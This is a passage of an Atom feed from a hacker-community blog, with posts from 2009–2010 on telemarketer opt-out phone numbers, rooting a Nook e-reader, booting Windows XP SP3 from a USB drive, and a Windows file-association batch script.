404-720-7878 (Fax)&lt;br /&gt;
&lt;br /&gt;
* (800) 399-7312,9 ( left message no apparent way to be removed from mailing list )                    </content>
                                    </entry>
                            <entry>
                    <title>Tires Plus</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:150744"/>
                                        <id>tag:houseofhackers.ning.com,2010-01-18:2092781:BlogPost:150744</id>
                                        <updated>2010-01-18T19:53:40.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        * 770 998 1234 ( did not know how to be removed redirected to corporate )&lt;br /&gt;
* 8000 269 4424, 0 ( redirected to Alex 727 298 5708 marking also did not know anything about removal )                    </summary>
                    <content type="html">
                        * 770 998 1234 ( did not know how to be removed redirected to corporate )&lt;br /&gt;
* 8000 269 4424, 0 ( redirected to Alex 727 298 5708 marking also did not know anything about removal )                    </content>
                                    </entry>
                            <entry>
                    <title>nook rooting nook root</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:147736"/>
                                        <id>tag:houseofhackers.ning.com,2009-12-14:2092781:BlogPost:147736</id>
                                        <updated>2009-12-14T17:30:51.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;a href=&quot;https://www.bordergatewayprotocol.net/aricon/nookroot/Rooting.htm&quot;&gt;https://www.bordergatewayprotocol.net/aricon/nookroot/Rooting.htm&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nookdevs.com/Rooting.&lt;br /&gt;
&lt;br /&gt;
nook, book, kindle, barnes and noble, fiction, nonfiction, ereader, amazon, electronic, wifi, 3g, att, android, google, hacks, hacking, linux, tips, tricks, developer, development, reverse engineering, reading, technology, future&lt;br /&gt;
&lt;br /&gt;
not really impressed but maybe they sim data account is uncapped and you can pop it in a diff hard&amp;hellip;                    </summary>
                    <content type="html">
                        &lt;a href=&quot;https://www.bordergatewayprotocol.net/aricon/nookroot/Rooting.htm&quot;&gt;https://www.bordergatewayprotocol.net/aricon/nookroot/Rooting.htm&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nookdevs.com/Rooting.&lt;br /&gt;
&lt;br /&gt;
nook, book, kindle, barnes and noble, fiction, nonfiction, ereader, amazon, electronic, wifi, 3g, att, android, google, hacks, hacking, linux, tips, tricks, developer, development, reverse engineering, reading, technology, future&lt;br /&gt;
&lt;br /&gt;
not really impressed but maybe they sim data account is uncapped and you can pop it in a diff hardware !                    </content>
                                    </entry>
                            <entry>
                    <title>windows XP SP3 installed to USB usboot with NIC and WIFI driverpacks</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:147532"/>
                                        <id>tag:houseofhackers.ning.com,2009-12-11:2092781:BlogPost:147532</id>
                                        <updated>2009-12-11T15:36:46.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        you can find the torrent online I will not post direct links here: search for usboot on top trackers&lt;br /&gt;
&lt;br /&gt;
windows XP SP3 installed to USB usboot with NIC and WIFI driverpacks&lt;br /&gt;
*** THIS IS NOT BART,ERD OR UBCD4WIN ETC THIS IS A REAL FULL XP PRO SP3 INSTALLED AND BOOTING FROM USB DRIVE ***&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is working and tested USB boot image using partimage&lt;br /&gt;
&lt;br /&gt;
* get a 4gig or higher usb drive&lt;br /&gt;
* download RMPrepUSB and format fat32 with boot&lt;br /&gt;
* make sure you can boot from the USB device&lt;br /&gt;
* extract the zip using 7-zip&amp;hellip;                    </summary>
                    <content type="html">
                        you can find the torrent online I will not post direct links here: search for usboot on top trackers&lt;br /&gt;
&lt;br /&gt;
windows XP SP3 installed to USB usboot with NIC and WIFI driverpacks&lt;br /&gt;
*** THIS IS NOT BART,ERD OR UBCD4WIN ETC THIS IS A REAL FULL XP PRO SP3 INSTALLED AND BOOTING FROM USB DRIVE ***&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is working and tested USB boot image using partimage&lt;br /&gt;
&lt;br /&gt;
* get a 4gig or higher usb drive&lt;br /&gt;
* download RMPrepUSB and format fat32 with boot&lt;br /&gt;
* make sure you can boot from the USB device&lt;br /&gt;
* extract the zip using 7-zip.org etc&lt;br /&gt;
* use partimage to dump the ~2 gig image to the usb drive etc&lt;br /&gt;
* &lt;a href=&quot;http://www.sysresccd.org/Screenshots&quot;&gt;http://www.sysresccd.org/Screenshots&lt;/a&gt; for partimage if you do not have it also on Backtrack or any number of live linux distros&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
this is how I did it thank usboot.org&lt;br /&gt;
* the host mashine MUST have NFTS partiton on it for this to work it uses drive shadowning etc to clone the C:&lt;br /&gt;
* made sure the USB drive was bootable&lt;br /&gt;
* formated the USB drive FAT32 not on VMware but on the host mashine&lt;br /&gt;
* did base install of my windows XP with driverpacks on a VM&lt;br /&gt;
* extract the NIC and WIFI drivers from driverpacks.net&lt;br /&gt;
* ran phase 1-3 ok on the VM&lt;br /&gt;
&lt;br /&gt;
* you can even put this on cell phone and boot windows from minisd etc .. :)&lt;br /&gt;
* the image can be pushed and booted in under 4min on a USB or HDD for a quick hack&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
igf                    </content>
                                    </entry>
                            <entry>
                    <title>portable file extension and file assocrain manager</title>
                    <link rel="alternate" href="http://houseofhackers.ning.com/xn/detail/2092781:BlogPost:146171"/>
                                        <id>tag:houseofhackers.ning.com,2009-12-09:2092781:BlogPost:146171</id>
                                        <updated>2009-12-09T13:48:23.000Z</updated>
                                        <author><name>operat0r</name></author>
                    <summary type="html">
                        &lt;a href=&quot;http://rmccurdy.com/scripts/file_associations.bat.txt&quot;&gt;http://rmccurdy.com/scripts/file_associations.bat.txt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
this is really bad script do not run it .. I dont &quot;GET&quot; windows associations.. then again I don&#039;t care .. something about subkeys on xls files etc ... but who cares it works&lt;br /&gt;
&lt;br /&gt;
* each user can have there own associations to a file extension ( I think only if there are no subkeys or its not already defined ??? )&lt;br /&gt;
* xls has sub classes etc so I had to wipe the whole tree out :)&amp;hellip;                    </summary>
                    <content type="html">
                        &lt;a href=&quot;http://rmccurdy.com/scripts/file_associations.bat.txt&quot;&gt;http://rmccurdy.com/scripts/file_associations.bat.txt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
this is really bad script do not run it .. I dont &quot;GET&quot; windows associations.. then again I don&#039;t care .. something about subkeys on xls files etc ... but who cares it works&lt;br /&gt;
&lt;br /&gt;
* each user can have there own associations to a file extension ( I think only if there are no subkeys or its not already defined ??? )&lt;br /&gt;
* xls has sub classes etc so I had to wipe the whole tree out :)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
any tools comments etc ... I also tried PIM.exe &quot; portable &quot; but stupid as you need to drag the file onto the program or have root to ass right click extension                    </content>
                    <enclosure url="http://rmccurdy.com/scripts/file_associations.bat.txt" type="text/plain"/>                </entry>
                    </feed>
    
